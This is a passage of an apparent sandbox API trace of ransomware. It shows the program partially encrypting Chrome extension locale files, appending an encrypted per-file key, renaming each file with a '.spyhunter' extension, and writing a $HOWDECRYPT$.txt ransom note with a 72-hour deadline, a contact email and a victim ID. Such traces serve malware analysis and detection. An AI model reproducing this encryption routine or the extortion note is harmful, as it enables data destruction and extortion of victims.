HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\th\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\th\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\th\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\th\\messages.json.spyhunter")) returned 1 [0157.170] GetProcessHeap () returned 0x2c0000 [0157.170] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0157.170] GetProcessHeap () returned 0x2c0000 [0157.170] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0157.170] GetProcessHeap () returned 0x2c0000 [0157.170] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb9068 | out: hHeap=0x2c0000) returned 1 [0157.170] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cec60 | out: pbBuffer=0x25cec60) returned 1 [0157.170] GetProcessHeap () returned 0x2c0000 [0157.170] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0157.170] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cec58*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cec58*=0x30) returned 1 [0157.170] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ta\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ta\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0157.171] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ta\\messages.json") returned 164 [0157.171] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0157.171] GetProcessHeap () returned 0x2c0000 [0157.171] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0157.171] ReadFile (in: hFile=0xa0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cec1c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25cec1c*=0x2800, lpOverlapped=0x0) returned 1 [0157.182] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0157.182] WriteFile (in: hFile=0xa0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cec1c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25cec1c*=0x2800, lpOverlapped=0x0) returned 1 [0157.182] GetProcessHeap () returned 0x2c0000 [0157.182] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0157.182] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0157.182] WriteFile (in: hFile=0xa0, lpBuffer=0x25cec5c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cec1c, lpOverlapped=0x0 | out: lpBuffer=0x25cec5c*, lpNumberOfBytesWritten=0x25cec1c*=0x4, lpOverlapped=0x0) returned 1 [0157.182] WriteFile (in: hFile=0xa0, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cec1c, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25cec1c*=0x30, lpOverlapped=0x0) returned 1 [0157.182] CloseHandle (hObject=0xa0) returned 1 [0157.183] GetProcessHeap () returned 0x2c0000 [0157.183] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0157.183] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ta\\messages.json.spyhunter") returned 174 [0157.183] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ta\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ta\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ta\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ta\\messages.json.spyhunter")) returned 1 [0157.184] GetProcessHeap () returned 0x2c0000 [0157.184] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0157.184] GetProcessHeap () returned 0x2c0000 [0157.184] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0157.184] GetProcessHeap () returned 0x2c0000 [0157.184] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb8a08 | out: hHeap=0x2c0000) returned 1 [0157.184] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sr\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sr\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0157.185] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0157.185] WriteFile (in: hFile=0xa0, lpBuffer=0x25ceb93*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25cecbc, lpOverlapped=0x0 | out: lpBuffer=0x25ceb93*, lpNumberOfBytesWritten=0x25cecbc*=0x127, lpOverlapped=0x0) returned 1 [0157.186] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0157.186] WriteFile (in: hFile=0xa0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25cecbc, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25cecbc*=0x2ac, lpOverlapped=0x0) returned 1 [0157.186] CloseHandle (hObject=0xa0) returned 1 [0157.187] GetProcessHeap () returned 0x2c0000 [0157.187] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb83a8 | out: hHeap=0x2c0000) returned 1 [0157.187] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cec58 | out: pbBuffer=0x25cec58) returned 1 [0157.187] GetProcessHeap () returned 0x2c0000 [0157.187] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0157.187] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cec50*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cec50*=0x30) returned 1 [0157.187] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0157.188] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sr\\messages.json") returned 164 [0157.188] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0157.188] GetProcessHeap () returned 0x2c0000 [0157.188] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0157.188] ReadFile (in: hFile=0xa0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cec14, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25cec14*=0x2800, lpOverlapped=0x0) returned 1 [0157.201] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0157.201] WriteFile (in: hFile=0xa0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cec14, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25cec14*=0x2800, lpOverlapped=0x0) returned 1 [0157.202] GetProcessHeap () returned 0x2c0000 [0157.202] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0157.202] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0157.202] WriteFile (in: hFile=0xa0, lpBuffer=0x25cec54*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cec14, lpOverlapped=0x0 | out: lpBuffer=0x25cec54*, lpNumberOfBytesWritten=0x25cec14*=0x4, lpOverlapped=0x0) returned 1 [0157.202] WriteFile (in: hFile=0xa0, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cec14, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25cec14*=0x30, lpOverlapped=0x0) returned 1 [0157.202] CloseHandle (hObject=0xa0) returned 1 [0157.202] GetProcessHeap () returned 0x2c0000 [0157.202] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0157.202] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sr\\messages.json.spyhunter") returned 174 [0157.202] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sr\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sr\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sr\\messages.json.spyhunter")) returned 1 [0157.203] GetProcessHeap () returned 0x2c0000 [0157.203] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0157.203] GetProcessHeap () returned 0x2c0000 [0157.203] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0157.203] GetProcessHeap () returned 0x2c0000 [0157.204] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb8210 | out: hHeap=0x2c0000) returned 1 [0157.204] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ru\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ru\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0157.204] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0157.204] WriteFile (in: hFile=0xa0, lpBuffer=0x25ceb8b*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25cecb4, lpOverlapped=0x0 | out: lpBuffer=0x25ceb8b*, lpNumberOfBytesWritten=0x25cecb4*=0x127, lpOverlapped=0x0) returned 1 [0157.205] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0157.205] WriteFile (in: hFile=0xa0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25cecb4, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25cecb4*=0x2ac, lpOverlapped=0x0) returned 1 [0157.205] CloseHandle (hObject=0xa0) returned 1 [0157.206] GetProcessHeap () returned 0x2c0000 [0157.206] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fe5d30 | out: hHeap=0x2c0000) returned 1 [0157.206] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cec50 | out: pbBuffer=0x25cec50) returned 1 [0157.206] GetProcessHeap () returned 0x2c0000 [0157.206] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0157.206] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cec48*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cec48*=0x30) returned 1 [0157.206] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ru\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ru\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0157.207] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ru\\messages.json") returned 164 [0157.207] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0157.207] GetProcessHeap () returned 0x2c0000 [0157.207] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0157.207] ReadFile (in: hFile=0xa0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cec0c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25cec0c*=0x2800, lpOverlapped=0x0) returned 1 [0157.223] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0157.223] WriteFile (in: hFile=0xa0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cec0c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25cec0c*=0x2800, lpOverlapped=0x0) returned 1 [0157.223] GetProcessHeap () returned 0x2c0000 [0157.223] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0157.223] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0157.223] WriteFile (in: hFile=0xa0, lpBuffer=0x25cec4c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cec0c, lpOverlapped=0x0 | out: lpBuffer=0x25cec4c*, lpNumberOfBytesWritten=0x25cec0c*=0x4, lpOverlapped=0x0) returned 1 [0157.223] WriteFile (in: hFile=0xa0, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cec0c, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25cec0c*=0x30, lpOverlapped=0x0) returned 1 [0157.223] CloseHandle (hObject=0xa0) returned 1 [0157.223] GetProcessHeap () returned 0x2c0000 [0157.223] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0157.223] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ru\\messages.json.spyhunter") returned 174 [0157.224] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ru\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ru\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ru\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ru\\messages.json.spyhunter")) returned 1 [0157.225] GetProcessHeap () returned 0x2c0000 [0157.225] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0157.225] GetProcessHeap () returned 0x2c0000 [0157.225] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0157.225] GetProcessHeap () returned 0x2c0000 [0157.225] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fe5b98 | out: hHeap=0x2c0000) returned 1 [0157.225] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nl\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nl\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0157.226] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0157.226] WriteFile (in: hFile=0xa0, lpBuffer=0x25ceb83*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25cecac, lpOverlapped=0x0 | out: lpBuffer=0x25ceb83*, lpNumberOfBytesWritten=0x25cecac*=0x127, lpOverlapped=0x0) returned 1 [0157.227] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0157.227] WriteFile (in: hFile=0xa0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25cecac, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25cecac*=0x2ac, lpOverlapped=0x0) returned 1 [0157.227] CloseHandle (hObject=0xa0) returned 1 [0157.227] GetProcessHeap () returned 0x2c0000 [0157.228] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fe4ed8 | out: hHeap=0x2c0000) returned 1 [0157.228] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cec48 | out: pbBuffer=0x25cec48) returned 1 [0157.228] GetProcessHeap () returned 0x2c0000 [0157.228] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0157.228] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cec40*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cec40*=0x30) returned 1 [0157.228] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 